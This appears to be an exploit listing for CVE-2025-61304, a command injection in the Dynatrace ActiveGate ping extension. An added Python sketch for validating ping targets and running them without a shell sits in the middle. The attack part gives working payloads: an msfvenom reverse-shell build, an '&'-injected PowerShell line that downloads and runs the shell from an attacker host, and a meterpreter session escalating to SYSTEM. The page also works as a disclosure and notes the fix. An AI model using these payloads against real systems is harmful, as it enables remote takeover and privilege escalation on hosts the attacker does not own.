Exploit for CVE-2025-61304
2025-10-25 | CVSS 7.9
sploitus.com/exploit?id=…
CVE-2025-61304
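"An OS command injection vulnerability exists in the Dynatrace ActiveGate ping extension up to version 1.016 and can be exploited through a crafted IP address"
Under the hood, the ping extension uses the Windows command prompt to run the ping. The input field for the target host to test is 1024 characters long. After the IP address, an attacker can use the '&' character to append additional commands for ActiveGate to execute.
Reported to Dynatrace and fixed by this commit: github.com/Dynatrace/d…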
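The root cause described above is a target string reaching the command prompt unvalidated. The following is an added example, not the Dynatrace fix and not code from this page: a sketch of how a Python caller can validate the target and run ping without a shell. The names validate_target, build_ping_argv and ping_host are hypothetical.

```python
import ipaddress
import re
import subprocess

MAX_TARGET_LEN = 253  # DNS name limit, far below the 1024-character field

# Character allowlist applied first: rejects '&', '|', ';', quotes, spaces,
# and '%' (Python 3.9+ accepts arbitrary text after '%' as an IPv6 scope id).
_ALLOWED = re.compile(r"[A-Za-z0-9.:-]+")
# One DNS label: no leading or trailing hyphen, so "-t" cannot pass as a host.
_LABEL = re.compile(r"(?!-)[A-Za-z0-9-]{1,63}(?<!-)")


def validate_target(target):
    """Return the target if it is an IP literal or DNS hostname, else raise ValueError."""
    if not isinstance(target, str) or not 0 < len(target) <= MAX_TARGET_LEN:
        raise ValueError("target is empty or too long")
    if not _ALLOWED.fullmatch(target):
        raise ValueError("target contains characters outside the allowlist")
    try:
        return str(ipaddress.ip_address(target))
    except ValueError:
        pass  # not an IP literal, fall through to the hostname check
    labels = target.rstrip(".").split(".")
    if all(_LABEL.fullmatch(label) for label in labels):
        return target
    raise ValueError("target is not an IP address or hostname")


def build_ping_argv(target, count=1):
    """Build the argument vector for Windows ping; no command string is ever assembled."""
    return ["ping", "-n", str(int(count)), validate_target(target)]


def ping_host(target, count=1, timeout=10):
    """Run ping directly (shell=False), so cmd.exe never parses the target."""
    result = subprocess.run(build_ping_argv(target, count), shell=False,
                            capture_output=True, text=True, timeout=timeout)
    return result.returncode == 0
```

Validation and shell-free execution are independent layers: either one alone stops the '&' separator from being interpreted, and together they also cover option injection and oversized input.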
Exploiting the RCE to add a user:
Local user list before and after:
Other example payloads:
- Create a meterpreter reverse shell:
msfvenom -p windows/x64/meterpreter/reverse_tcp LHOST=192.168.51.200 LPORT=4444 -f exe > mshell.exe
- Download and execute the shell on the ActiveGate via the cloud UI using the ping extension:
google&powershell.exe $ProgressPreference = 'SilentlyContinue'; Invoke-WebRequest http://192.168.51.200/mshell.exe -OutFile c:\test\mshell.exe
google&c:\test\mshell.exe
- Resulting session
msf6 exploit(multi/handler) > set payload windows/x64/meterpreter/reverse_tcp
payload => windows/x64/meterpreter/reverse_tcp
msf6 exploit(multi/handler) > run
[*] Started reverse TCP handler on 192.168.51.200:4444
[*] Sending stage (200262 bytes) to 192.168.51.54
[*] Meterpreter session 3 opened (192.168.51.200:4444 -> 192.168.51.54:49800 ) at 2023-01-21 19:02:16 +0100
meterpreter > getuid
Server username: NT AUTHORITY\LOCAL SERVICE
meterpreter > getsystem
...got system via technique 5 (Named Pipe Impersonation (PrintSpooler variant)).
meterpreter > getuid
Server username: NT AUTHORITY\SYSTEM
meterpreter > sysinfo
Computer : WIN-9493M3CRTDV
OS : Windows 2016+ (10.0 Build 17763).
Architecture : x64
System Language : en_US
Domain : WORKGROUP
Logged On Users : 1
Meterpreter : x64/windows